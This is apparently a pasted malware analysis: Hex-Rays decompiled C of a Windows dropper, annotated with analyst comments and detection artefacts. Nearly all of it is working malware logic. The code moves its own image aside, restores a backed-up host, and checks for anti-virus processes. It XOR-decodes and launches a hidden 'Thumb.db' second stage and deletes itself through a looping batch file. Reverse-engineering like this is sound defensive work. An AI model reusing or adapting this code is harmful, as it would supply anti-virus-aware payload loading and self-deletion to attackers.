VirusDecompiled

a guest
Nov 23rd, 2012
  1. /* This file has been generated by the Hex-Rays decompiler.
  2. Copyright (c) 2009 Hex-Rays <[email protected]>
  3.  
  4. Detected compiler: Visual C++
  5. */
  6.  
  7. #include <windows.h>
  8. #include <defs.h>
  9.  
  10.  
  11. //-------------------------------------------------------------------------
  12. // Data declarations
  13.  
  14. // extern void *CDialog__messageMap; weak
  15. // extern void *CWinApp__messageMap; weak
  // Globals the decompiler recovered from the IDB. The function-pointer
  // tables are returned / installed by the MFC glue functions below; the
  // char[] symbols are IDA's auto-names for string literals (IDA derives the
  // name from the text), and the same literals appear inline in the function
  // bodies further down, so they are not referenced by name in this listing.
  extern int (*off_402220)(); // weak -- table whose address sub_401010 returns
  extern int (*off_402300)(); // weak -- table whose address sub_401200 returns
  extern int (*off_402350)(); // weak -- table sub_401150 stores at offset 0 of the dialog object (vtable, presumably)
  extern char Operation[]; // idb
  extern char aDelFQ0[]; // idb
  extern char aIfExistSGotoSt[]; // idb
  extern char aDelFQS[]; // idb
  extern char aStart[]; // idb
  extern char Mode[]; // idb
  extern char Format[]; // idb
  extern char aWb[]; // idb
  extern char aRb[]; // idb
  extern char FileName[]; // idb
  extern char ApplicationName[]; // idb
  // The five names below match the process names Install_Virus checks with
  // ProcessExists before running the secondary payload.
  extern char aFshoster32_exe[]; // idb
  extern char aFprottray_exe[]; // idb
  extern char aBdagent_exe[]; // idb
  extern char aAvp_exe[]; // idb
  extern char aMsmpeng_exe[]; // idb
  extern char String1[]; // idb
  extern char aBak[]; // idb
  extern char String2[]; // idb
  38.  
  39. //-------------------------------------------------------------------------
  40. // Function declarations
  41.  
  // Hex-Rays emits __thiscall for MFC member functions; mapping it to __cdecl
  // lets the listing be read (not linked) as plain C with `this` as a parameter.
  #define __thiscall __cdecl // Test compile in C mode
  
  // MFC application / dialog glue (message maps, runtime tables, ctors/dtors).
  void *__cdecl sub_401000();
  int (**__cdecl sub_401010())();
  void *__thiscall sub_401040(void *this, char a2);
  int CWinApp___CWinApp(void); // weak
  int __thiscall sub_4010B0(void *this);               // InitInstance-like: runs the dialog modally
  int __thiscall CDialog___CDialog(_DWORD); // weak
  void *__thiscall sub_401150(void *this, int a2);     // dialog constructor (template 102)
  void *__thiscall sub_4011C0(void *this, char a2);
  void *__cdecl sub_4011F0();
  int (**__cdecl sub_401200())();
  signed int __thiscall sub_401210(void *this);        // OnInitDialog: sets icons, then calls Install_Virus()
  BOOL __thiscall sub_401330(int this);                // EnableWindow(FALSE) on the HWND at this+32
  BOOL __thiscall sub_401340(int this);                // EnableWindow(TRUE) on the HWND at this+32
  // Payload helpers -- see the per-function comments for behaviour and artefacts.
  int __cdecl sub_401350(LPCSTR lpFileName); // idb   // file-exists probe (CreateFileA / ERROR_FILE_NOT_FOUND)
  void *__cdecl sub_401390(int a1);                    // writes and runs a self-deleting batch file
  signed int __cdecl sub_4014B0(const char *Filename, const char *a2, char a3); // single-byte XOR file copy
  int __cdecl ProcessExists(LPCSTR lpString1); // idb // PID of a process by image name, -1 if absent
  void *__cdecl Install_Virus();                       // main payload, reached from sub_401210
  // void __cdecl operator delete(void *); idb
  // int __thiscall CDialog___CDialog(_DWORD); weak
  // int __thiscall CDialog__DoModal(_DWORD); weak
  // int __thiscall CDialog__OnOK(_DWORD); weak
  // struct HINSTANCE__ *__stdcall AfxFindResourceHandle(const char *, const char *); idb
  // int AfxGetModuleState(void); weak
  // int __stdcall CDialog__CDialog(_DWORD, _DWORD); weak
  // int CDialog__OnInitDialog(void); weak
  // int _CxxFrameHandler(void); weak
  int __cdecl sub_401C22();
  // BOOL __stdcall Process32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
  // BOOL __stdcall Process32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
  // HANDLE __stdcall CreateToolhelp32Snapshot(DWORD dwFlags, DWORD th32ProcessID);
  // int __stdcall AfxWinMain(struct HINSTANCE__ *, struct HINSTANCE__ *, char *, int); idb
  // int __usercall sub_401CB0<eax>(int a1<ebp>);
  // C++ exception-handling thunks and unwind funclets (compiler generated).
  int __cdecl SEH_4010B0();
  // int __usercall sub_401CD0<eax>(int a1<ebp>);
  int __cdecl SEH_401150();
  // BOOL __stdcall CloseHandle(HANDLE hObject);
  // HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
  // LPSTR __stdcall lstrcpyA(LPSTR lpString1, LPCSTR lpString2);
  // UINT __stdcall GetWindowsDirectoryA(LPSTR lpBuffer, UINT uSize);
  // UINT __stdcall SetErrorMode(UINT uMode);
  // int __stdcall lstrcmpiA(LPCSTR lpString1, LPCSTR lpString2);
  // BOOL __stdcall DeleteFileA(LPCSTR lpFileName);
  // BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
  // LPSTR __stdcall GetCommandLineA();
  // void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo);
  // BOOL __stdcall MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName);
  // LPSTR __stdcall lstrcatA(LPSTR lpString1, LPCSTR lpString2);
  // int __stdcall lstrlenA(LPCSTR lpString);
  // DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize);
  // DWORD __stdcall GetLastError();
  // _DWORD __stdcall AfxWinMain(struct HINSTANCE__ *, struct HINSTANCE__ *, char *, int); weak
  // size_t __cdecl fread(void *DstBuf, size_t ElementSize, size_t Count, FILE *File);
  // size_t __cdecl fwrite(const void *Str, size_t Size, size_t Count, FILE *File);
  // int sprintf(char *Dest, const char *Format, ...);
  // FILE *__cdecl fopen(const char *Filename, const char *Mode);
  // int fprintf(FILE *File, const char *Format, ...);
  // int __cdecl fclose(FILE *File);
  // HINSTANCE __stdcall ShellExecuteA(HWND hwnd, LPCSTR lpOperation, LPCSTR lpFile, LPCSTR lpParameters, LPCSTR lpDirectory, INT nShowCmd);
  // BOOL __stdcall EnableWindow(HWND hWnd, BOOL bEnable);
  // HICON __stdcall LoadIconA(HINSTANCE hInstance, LPCSTR lpIconName);
  // LRESULT __stdcall SendMessageA(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
  106.  
  107.  
  108. //----- (00401000) --------------------------------------------------------
  // Returns the address of CWinApp's message map. Shape of an MFC
  // GetMessageMap() override for the application class (inferred from the
  // symbol name; the decompiler only guessed the global's type).
  void *__cdecl sub_401000()
  {
      return CWinApp__messageMap;
  }
  113. // 402184: using guessed type void *CWinApp__messageMap;
  114.  
  115. //----- (00401010) --------------------------------------------------------
  // Returns a pointer to the function-pointer table at off_402220
  // (MFC runtime-class / message-map table accessor, presumably).
  int (**__cdecl sub_401010())()
  {
      return &off_402220;
  }
  120. // 402220: using guessed type int (*off_402220)();
  121.  
  122. //----- (00401040) --------------------------------------------------------
  // Destroys the application object: runs CWinApp's destructor
  // (CWinApp___CWinApp appears to be IDA's rendering of CWinApp::~CWinApp)
  // and frees the object when bit 0 of a2 is set. This is the shape of an
  // MSVC "scalar deleting destructor": a2 is the delete flag, not user data.
  // @param this  the CWinApp-derived object
  // @param a2    flags; bit 0 requests operator delete on the object
  // @return the object pointer (possibly already freed), as the thunk does
  void *__thiscall sub_401040(void *this, char a2)
  {
      void *v2; // esi@1
  
      v2 = this;
      CWinApp___CWinApp();
      if ( a2 & 1 )
          operator delete(v2);
      return v2;
  }
  133. // 401060: using guessed type int CWinApp___CWinApp(void);
  134.  
  135. //----- (004010B0) --------------------------------------------------------
  // Application start-up (InitInstance-like): constructs the dialog with
  // sub_401150 in the stack buffer v3, stores its address in dword slot 8 of
  // the app object (offset 0x20; presumably CWinThread::m_pMainWnd -- TODO
  // confirm against the MFC version), runs it modally, destroys it and
  // returns 0. Because the dialog's OnInitDialog (sub_401210) calls
  // Install_Virus(), the whole payload executes before DoModal returns.
  // v4 is the compiler's exception-state counter (0 = dialog live, -1 = dead).
  // @param this  the CWinApp-derived application object
  // @return 0
  int __thiscall sub_4010B0(void *this)
  {
      void *v2; // esi@1
      char v3; // [sp+4h] [bp-70h]@1
      int v4; // [sp+70h] [bp-4h]@1
  
      v2 = this;
      sub_401150(&v3, 0);
      v4 = 0;
      *((_DWORD *)v2 + 8) = &v3;
      CDialog__DoModal(&v3);
      v4 = -1;
      CDialog___CDialog(&v3);
      return 0;
  }
  151. // 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  152. // 401970: using guessed type int __thiscall CDialog__DoModal(_DWORD);
  153.  
  154. //----- (00401150) --------------------------------------------------------
  // Dialog constructor: CDialog(102 /* dialog template ID */, a2 /* parent */),
  // then installs off_402350 at offset 0 (the vtable, presumably) and caches
  // icon resource 0x80 (looked up as type 0xE == RT_GROUP_ICON) in dword
  // slot 24 (offset 0x60); sub_401210 later hands that HICON to WM_SETICON.
  // NOTE(review): 0x80 (128) is the value MFC's AppWizard assigns to
  // IDR_MAINFRAME -- inferred, not visible here.
  // @param this  uninitialised dialog object
  // @param a2    parent window argument forwarded to CDialog::CDialog
  // @return this
  void *__thiscall sub_401150(void *this, int a2)
  {
      void *v3; // esi@1
      HINSTANCE v4; // eax@1
  
      v3 = this;
      CDialog__CDialog(102, a2);
      *(_DWORD *)v3 = &off_402350;
      AfxGetModuleState();
      v4 = AfxFindResourceHandle((const char *)0x80, (const char *)0xE);
      *((_DWORD *)v3 + 24) = LoadIconA(v4, (LPCSTR)0x80);
      return v3;
  }
  168. // 401A30: using guessed type int AfxGetModuleState(void);
  169. // 401A36: using guessed type int __stdcall CDialog__CDialog(_DWORD, _DWORD);
  170. // 402350: using guessed type int (*off_402350)();
  171.  
  172. //----- (004011C0) --------------------------------------------------------
  // Scalar deleting destructor for the dialog class: runs CDialog's
  // destructor and frees the object when bit 0 of a2 is set (same pattern
  // as sub_401040 for the application object).
  // @param this  the dialog object
  // @param a2    flags; bit 0 requests operator delete
  // @return the object pointer
  void *__thiscall sub_4011C0(void *this, char a2)
  {
      void *v2; // esi@1
  
      v2 = this;
      CDialog___CDialog(this);
      if ( a2 & 1 )
          operator delete(v2);
      return v2;
  }
  183. // 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  184.  
  185. //----- (004011F0) --------------------------------------------------------
  // Returns the address of CDialog's message map (GetMessageMap()-style
  // accessor for the dialog class, inferred from the symbol name).
  void *__cdecl sub_4011F0()
  {
      return CDialog__messageMap;
  }
  190. // 40212C: using guessed type void *CDialog__messageMap;
  191.  
  192. //----- (00401200) --------------------------------------------------------
  // Returns a pointer to the function-pointer table at off_402300
  // (dialog-class counterpart of sub_401010).
  int (**__cdecl sub_401200())()
  {
      return &off_402300;
  }
  197. // 402300: using guessed type int (*off_402300)();
  198.  
  199. //----- (00401210) --------------------------------------------------------
  // Dialog OnInitDialog override and the trigger point for the payload:
  //  1. calls the base CDialog::OnInitDialog;
  //  2. sets the dialog icon with WM_SETICON (0x80) for ICON_BIG (wParam 1)
  //     and ICON_SMALL (wParam 0), using the HWND in dword slot 8 (offset 32,
  //     the slot sub_401330/sub_401340 also treat as the window handle) and
  //     the HICON sub_401150 cached in slot 24;
  //  3. calls Install_Virus() synchronously, then CDialog::OnOK, which ends
  //     the modal loop -- so the window is closed as soon as the payload
  //     has run and the user sees at most a flicker.
  // @param this  the dialog object
  // @return 1 (TRUE, the usual OnInitDialog return value)
  signed int __thiscall sub_401210(void *this)
  {
      void *v2; // esi@1
  
      v2 = this;
      CDialog__OnInitDialog();
      SendMessageA(*((HWND *)v2 + 8), 128u, 1u, *((_DWORD *)v2 + 24));
      SendMessageA(*((HWND *)v2 + 8), 0x80u, 0, *((_DWORD *)v2 + 24));
      Install_Virus();
      CDialog__OnOK(v2);
      return 1;
  }
  212. // 401982: using guessed type int __thiscall CDialog__OnOK(_DWORD);
  213. // 401A3C: using guessed type int CDialog__OnInitDialog(void);
  214.  
  215. //----- (00401330) --------------------------------------------------------
  // Disables the window whose HWND is stored at this+32 (the same slot
  // sub_401210 uses as the dialog's own handle). Not called from any
  // function in this listing.
  // @return EnableWindow's previous-state result
  BOOL __thiscall sub_401330(int this)
  {
      return EnableWindow(*(HWND *)(this + 32), 0);
  }
  220.  
  221. //----- (00401340) --------------------------------------------------------
  // Re-enables the window whose HWND is stored at this+32; counterpart of
  // sub_401330. Not called from any function in this listing.
  // @return EnableWindow's previous-state result
  BOOL __thiscall sub_401340(int this)
  {
      return EnableWindow(*(HWND *)(this + 32), 1);
  }
  226.  
  227. //----- (00401350) --------------------------------------------------------
  // "Does this file exist?" probe, used by sub_401390 to find a free temp
  // name. Opens the file with 0x80000000 = GENERIC_READ, share 1 =
  // FILE_SHARE_READ, disposition 3 = OPEN_EXISTING.
  // Returns 0 only when the open failed with error 2 (ERROR_FILE_NOT_FOUND);
  // every other outcome returns 1. Consequences worth knowing when reading
  // sub_401390: a failure with any other code (access denied, sharing
  // violation) is also treated as "exists", and CloseHandle is then called
  // on INVALID_HANDLE_VALUE (a no-op failure), so the name search keeps
  // incrementing past unreadable files.
  // @param lpFileName  path to probe
  // @return 1 if the file exists or cannot be ruled out, 0 if definitely absent
  signed int __cdecl sub_401350(LPCSTR lpFileName)
  {
      HANDLE v1; // esi@1
      signed int result; // eax@3
  
      v1 = CreateFileA(lpFileName, 0x80000000u, 1u, 0, 3u, 0, 0);
      if ( v1 != (HANDLE)-1 || GetLastError() != 2 )
      {
          CloseHandle(v1);
          result = 1;
      }
      else
      {
          result = 0;
      }
      return result;
  }
  245.  
  246. //----- (00401390) --------------------------------------------------------
  // Self-deletion helper, called last from Install_Virus with the path the
  // running image was moved to. As decompiled it:
  //  - calls SetErrorMode(1) (SEM_FAILCRITICALERRORS) so no error box appears;
  //  - builds "%WINDIR%\temp\temp<N>.bat" for N = 0, 1, 2, ... and keeps the
  //    first name that sub_401350 reports as absent -- this file is the main
  //    on-disk artefact to look for;
  //  - writes a batch script that loops "del /f /q <a1>" until "if exist"
  //    fails, then deletes itself ("del /f /q %0"), and launches it with
  //    ShellExecuteA("open").
  // Buffer layout: String2 (1+256+2+1 = 260 bytes) holds the Windows
  // directory, File (260 bytes) the batch path; both are zeroed piecewise
  // because the decompiler split one MAX_PATH array into several locals.
  // The L"w" mode string is a decompiler display artefact -- fopen takes a
  // narrow "w" (hedged; confirm in the disassembly). The function-pointer
  // cast on the first fprintf is likewise decompiler noise.
  // @param a1  path (char *) of the file the batch script has to delete
  // @return NULL if the batch file could not be created, otherwise the
  //         ShellExecuteA result (an HINSTANCE-sized status code)
  void *__cdecl sub_401390(int a1)
  {
      int v1; // esi@1
      int v2; // ST18_4@2
      void *result; // eax@3
      FILE *v4; // esi@3
      CHAR File; // [sp+8h] [bp-208h]@1
      char v6; // [sp+9h] [bp-207h]@1
      __int16 v7; // [sp+109h] [bp-107h]@1
      char v8; // [sp+10Bh] [bp-105h]@1
      CHAR String2; // [sp+10Ch] [bp-104h]@1
      char v10; // [sp+10Dh] [bp-103h]@1
      __int16 v11; // [sp+20Dh] [bp-3h]@1
      char v12; // [sp+20Fh] [bp-1h]@1
  
      String2 = 0;
      memset(&v10, 0, 0x100u);
      v11 = 0;
      v12 = 0;
      File = 0;
      memset(&v6, 0, 0x100u);
      v7 = 0;
      v1 = 0;
      v8 = 0;
      SetErrorMode(1u);
      GetWindowsDirectoryA(&String2, 0x104u);
      lstrcpyA(&File, &String2);
      // Find the first temp<N>.bat that does not already exist.
      do
      {
          v2 = v1++;
          sprintf(&File, "%s\\temp\\temp%d.bat", &String2, v2);
      }
      while ( sub_401350(&File) );
      result = fopen(&File, L"w");
      v4 = (FILE *)result;
      if ( result )
      {
          ((void (__cdecl *)(void *, _DWORD))fprintf)(result, ":start\r\n");
          fprintf(v4, "del /f /q \"%s\"\r\n", a1);
          fprintf(v4, "if exist \"%s\" goto start\r\n", a1);
          fprintf(v4, "del /f /q %%0\r\n");
          fclose(v4);
          result = ShellExecuteA(0, "open", &File, 0, 0, 0);
      }
      return result;
  }
  293.  
  294. //----- (004014B0) --------------------------------------------------------
  // Copies Filename to a2 while XOR-ing every byte with a3 -- a single-byte
  // XOR, so the same call both obfuscates and de-obfuscates. Install_Virus
  // uses it with key -86 (0xAA) to turn "Thumb.db" into "Thumb.db.tmp"
  // before executing it, i.e. the secondary payload ships XOR-masked.
  // Works in 1024-byte chunks; the fwrite return value is not checked, so a
  // short write would go unnoticed.
  // @param Filename  input path (opened "rb")
  // @param a2        output path (opened "wb"; created or truncated)
  // @param a3        XOR key applied to each byte
  // @return 0 if either file cannot be opened, 1 otherwise
  signed int __cdecl sub_4014B0(const char *Filename, const char *a2, char a3)
  {
      FILE *v3; // esi@1
      FILE *v4; // ebx@2
      size_t i; // eax@3
      signed int j; // ecx@4
      char DstBuf[1024]; // [sp+Ch] [bp-400h]@3
  
      v3 = fopen(Filename, "rb");
      if ( !v3 )
          return 0;
      v4 = fopen(a2, "wb");
      if ( !v4 )
      {
          fclose(v3);
          return 0;
      }
      memset(DstBuf, 0, sizeof(DstBuf));
      for ( i = fread(DstBuf, 1u, 0x400u, v3); i; i = fread(DstBuf, 1u, 0x400u, v3) )
      {
          for ( j = 0; j < (signed int)i; ++j )
              DstBuf[j] ^= a3;
          fwrite(DstBuf, i, 1u, v4);
          memset(DstBuf, 0, sizeof(DstBuf));
      }
      fclose(v3);
      fclose(v4);
      return 1;
  }
  324. // 4014B0: using guessed type char DstBuf[1024];
  325.  
  326. //----- (004015A0) --------------------------------------------------------
  // Looks up a running process by image name, case-insensitively (lstrcmpiA
  // against PROCESSENTRY32.szExeFile), in a Toolhelp snapshot (flag 2 =
  // TH32CS_SNAPPROCESS). dwSize 296 is sizeof(PROCESSENTRY32) for the 32-bit
  // ANSI layout. Install_Virus calls this for a list of security-product
  // process names and only continues when every call returns -1.
  // NOTE(review): CreateToolhelp32Snapshot signals failure with
  // INVALID_HANDLE_VALUE (-1), not NULL, so `if ( v2 )` never takes the else
  // branch; on failure Process32First simply fails, v1 stays -1 and
  // CloseHandle is called on the invalid handle. Net effect: a snapshot
  // failure reads as "process not running".
  // @param lpString1  image file name to search for (e.g. "avp.exe")
  // @return the PID of the first match, or -1 when absent / on failure
  signed int __cdecl ProcessExists(LPCSTR lpString1)
  {
      DWORD v1; // ebp@1
      HANDLE v2; // esi@1
      signed int result; // eax@7
      PROCESSENTRY32 pe; // [sp+8h] [bp-128h]@1
  
      v1 = -1;
      pe.dwSize = 296;
      v2 = CreateToolhelp32Snapshot(2u, 0);
      if ( v2 )
      {
          if ( Process32First(v2, &pe) )
          {
              if ( lstrcmpiA(lpString1, pe.szExeFile) )
              {
                  while ( Process32Next(v2, &pe) )
                  {
                      if ( !lstrcmpiA(lpString1, pe.szExeFile) )
                          goto LABEL_6;
                  }
              }
              else
              {
  LABEL_6:
                  v1 = pe.th32ProcessID;
              }
          }
          CloseHandle(v2);
          result = v1;
      }
      else
      {
          result = -1;
      }
      return result;
  }
  364.  
  365. //----- (00401630) --------------------------------------------------------
  // Main payload, reached from the dialog's OnInitDialog (sub_401210).
  //
  // Buffers: String2 = this module's own path (GetModuleFileNameA); String and
  // ExistingFileName start as copies of it. v7 and v9 are the decompiler's
  // view of the bytes that follow String / ExistingFileName, so `v7[v0] = 0`
  // writes String[v0 + 1] -- the truncations below therefore keep the
  // '\\' (92) or '.' (46) they searched for.
  //
  // Sequence (no return value of MoveFileA/CreateProcessA is checked):
  //  1. String := directory of own path (up to and including the last '\\')
  //     + "tmp.tmp"; MoveFileA moves the running image there.
  //  2. ExistingFileName := own path up to and including the last '.' +
  //     "bak", i.e. "<own name>.bak"; MoveFileA renames that file onto the
  //     original path (String2).
  //  3. CreateProcessA(String2, GetCommandLineA()) starts whatever now sits
  //     at the original path, with this process's command line. This looks
  //     like a backed-up host program being restored and re-run (inferred:
  //     the code that produces the ".bak" is not in this listing).
  //  4. Only if none of ccsvchst.exe, MsMpEng.exe, avp.exe, bdagent.exe,
  //     FProtTray.exe, fshoster32.exe is running (ProcessExists == -1 for
  //     each; these appear to be anti-virus product process names): XOR-
  //     decode "Thumb.db" with key 0xAA into "Thumb.db.tmp" (sub_4014B0) and
  //     execute it. Both names are relative, so they resolve against the
  //     process's current directory.
  //  5. DeleteFileA("Thumb.db") unconditionally, then hand the moved copy
  //     (String, "<dir>\\tmp.tmp") to sub_401390 for batch-file self-deletion.
  //
  // Observable artefacts for detection: the running image renamed to
  // "tmp.tmp" in its own directory, a sibling "<name>.bak" renamed back over
  // the original name, "Thumb.db" / "Thumb.db.tmp" in the working directory,
  // and the "%WINDIR%\temp\temp<N>.bat" self-delete script.
  // STARTUPINFOA is zeroed as cb + 0x40 = 68 bytes, then refilled by
  // GetStartupInfoA before each CreateProcessA.
  // @return the sub_401390 result (ShellExecuteA status, or NULL if the
  //         batch file could not be written)
  void *__cdecl Install_Virus()
  {
      int v0; // eax@1
      int v1; // eax@6
      CHAR *v2; // eax@11
      struct _PROCESS_INFORMATION ProcessInformation; // [sp+10h] [bp-360h]@11
      struct _STARTUPINFOA StartupInfo; // [sp+20h] [bp-350h]@11
      CHAR String; // [sp+64h] [bp-30Ch]@1
      char v7[259]; // [sp+65h] [bp-30Bh]@1
      CHAR ExistingFileName; // [sp+168h] [bp-208h]@1
      char v9[259]; // [sp+169h] [bp-207h]@1
      CHAR String2; // [sp+26Ch] [bp-104h]@1
      char v11; // [sp+26Dh] [bp-103h]@1
      __int16 v12; // [sp+36Dh] [bp-3h]@1
      char v13; // [sp+36Fh] [bp-1h]@1
  
      String2 = 0;
      String = 0;
      memset(&v11, 0, 0x100u);
      v12 = 0;
      v13 = 0;
      ExistingFileName = 0;
      memset(v7, 0, 0x100u);
      *(_WORD *)&v7[256] = 0;
      v7[258] = 0;
      memset(v9, 0, 0x100u);
      *(_WORD *)&v9[256] = 0;
      v9[258] = 0;
      GetModuleFileNameA(0, &String2, 0x104u);
      lstrcpyA(&String, &String2);
      lstrcpyA(&ExistingFileName, &String2);
      // Step 1: truncate String just after its last backslash.
      v0 = lstrlenA(&String) - 1;
      if ( v0 >= 0 )
      {
          while ( *(&String + v0) != 92 )
          {
              --v0;
              if ( v0 < 0 )
                  goto LABEL_6;
          }
          v7[v0] = 0;
      }
  LABEL_6:
      lstrcatA(&String, "tmp.tmp");
      MoveFileA(&String2, &String);
      // Step 2: truncate ExistingFileName just after its last '.'.
      v1 = lstrlenA(&ExistingFileName) - 1;
      if ( v1 >= 0 )
      {
          while ( *(&ExistingFileName + v1) != 46 )
          {
              --v1;
              if ( v1 < 0 )
                  goto LABEL_11;
          }
          v9[v1] = 0;
      }
  LABEL_11:
      lstrcatA(&ExistingFileName, "bak");
      MoveFileA(&ExistingFileName, &String2);
      // Step 3: run whatever is now at the original path.
      StartupInfo.cb = 0;
      memset(&StartupInfo.lpReserved, 0, 0x40u);
      ProcessInformation.hThread = 0;
      ProcessInformation.hProcess = 0;
      ProcessInformation.dwProcessId = 0;
      ProcessInformation.dwThreadId = 0;
      GetStartupInfoA(&StartupInfo);
      v2 = GetCommandLineA();
      CreateProcessA(&String2, v2, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
      // Step 4: security-product check, then decode and run the second stage.
      if ( ProcessExists("ccsvchst.exe") == -1 )
      {
          if ( ProcessExists("MsMpEng.exe") == -1 )
          {
              if ( ProcessExists("avp.exe") == -1 )
              {
                  if ( ProcessExists("bdagent.exe") == -1 )
                  {
                      if ( ProcessExists("FProtTray.exe") == -1 )
                      {
                          if ( ProcessExists("fshoster32.exe") == -1 )
                          {
                              GetStartupInfoA(&StartupInfo);
                              if ( sub_4014B0("Thumb.db", "Thumb.db.tmp", -86) )
                                  CreateProcessA("Thumb.db.tmp", 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
                          }
                      }
                  }
              }
          }
      }
      // Step 5: remove the masked stage and schedule self-deletion of tmp.tmp.
      DeleteFileA("Thumb.db");
      return sub_401390((int)&String);
  }
  458. // 401630: using guessed type char var_30B[259];
  459. // 401630: using guessed type char var_207[259];
  460.  
  461. //----- (00401C22) --------------------------------------------------------
  // Empty stub that always returns 0; nothing in this listing calls it.
  int __cdecl sub_401C22()
  {
      return 0;
  }
  466.  
  467. //----- (00401CB0) --------------------------------------------------------
  // Compiler-generated unwind funclet (IDA's __usercall / <ebp> notation is
  // not C). Takes the parent frame pointer and destroys the dialog object
  // that sub_4010B0 keeps at bp-70h (= ebp - 112) if an exception unwinds
  // through that frame.
  int __usercall sub_401CB0<eax>(int a1<ebp>)
  {
      return CDialog___CDialog(a1 - 112);
  }
  472. // 401120: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  473.  
  474. //----- (00401CB8) --------------------------------------------------------
  // C++ exception-handler thunk for the frame of sub_4010B0; just forwards
  // to the CRT's _CxxFrameHandler.
  int __cdecl SEH_4010B0()
  {
      return _CxxFrameHandler();
  }
  479. // 401A92: using guessed type int _CxxFrameHandler(void);
  480.  
  481. //----- (00401CD0) --------------------------------------------------------
  // Compiler-generated unwind funclet (see sub_401CB0): destroys the dialog
  // object whose pointer is saved at ebp-16 in the parent frame -- presumably
  // the `this` of sub_401150, given the matching SEH_401150 thunk; the saved
  // slot itself is not visible in this listing.
  int __usercall sub_401CD0<eax>(int a1<ebp>)
  {
      return CDialog___CDialog(*(_DWORD *)(a1 - 16));
  }
  486. // 40196A: using guessed type int __thiscall CDialog___CDialog(_DWORD);
  487.  
  488. //----- (00401CD8) --------------------------------------------------------
  // C++ exception-handler thunk for the frame of sub_401150; forwards to
  // the CRT's _CxxFrameHandler.
  int __cdecl SEH_401150()
  {
      return _CxxFrameHandler();
  }
  493. // 401A92: using guessed type int _CxxFrameHandler(void);
  494.  
  495. // ALL OK, 21 function(s) have been successfully decompiled